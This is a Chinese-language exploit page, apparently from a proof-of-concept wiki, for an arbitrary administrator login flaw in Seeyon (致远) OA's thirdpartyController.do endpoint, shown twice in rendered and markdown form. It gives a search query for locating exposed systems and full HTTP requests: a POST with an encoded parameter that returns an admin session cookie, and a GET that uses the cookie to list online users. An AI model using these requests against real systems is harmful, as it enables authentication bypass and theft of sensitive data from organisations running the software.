fofamini-wiki

登录白背景

源码

致远OA thirdpartyController.do 任意管理员登陆漏洞

一、漏洞简介

致远OA系统控制不当，导致可以通过请求获取管理员权限cookie，绕过登陆限制，获取系统敏感信息。

二、影响版本

致远OA

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

使用poc获取管理员cookie

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

GET /seeyon/online.do?method=showOnlineUser HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=593F88877C66977D65F5690CD2FC9E74; Path=/seeyon
Connection: close
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/zqogrgrko22dnrhk

# 致远OA thirdpartyController.do 任意管理员登陆漏洞

# 一、漏洞简介
致远OA系统控制不当，导致可以通过请求获取管理员权限cookie，绕过登陆限制，获取系统敏感信息。

# 二、影响版本
+ 致远OA

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1699722901222-5422df33-7bbc-4465-8d26-879858556787.png](./img/8O4_W0FzBeTrSlA6/1699722901222-5422df33-7bbc-4465-8d26-879858556787-652681.png)

# 四、漏洞复现
使用poc获取管理员cookie

```plain
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
```

![1699722944914-0922fc47-408f-41ce-9101-cd37b3de0f80.png](./img/8O4_W0FzBeTrSlA6/1699722944914-0922fc47-408f-41ce-9101-cd37b3de0f80-850942.png)

![1699722952629-078aefe5-ac3a-415b-8070-a6b2b827ac72.png](./img/8O4_W0FzBeTrSlA6/1699722952629-078aefe5-ac3a-415b-8070-a6b2b827ac72-499867.png)

```java
GET /seeyon/online.do?method=showOnlineUser HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=593F88877C66977D65F5690CD2FC9E74; Path=/seeyon
Connection: close
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
```

![1725956543853-e88295f0-9f01-4ff6-b81e-7f4224e16050.png](./img/8O4_W0FzBeTrSlA6/1725956543853-e88295f0-9f01-4ff6-b81e-7f4224e16050-645986.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zqogrgrko22dnrhk>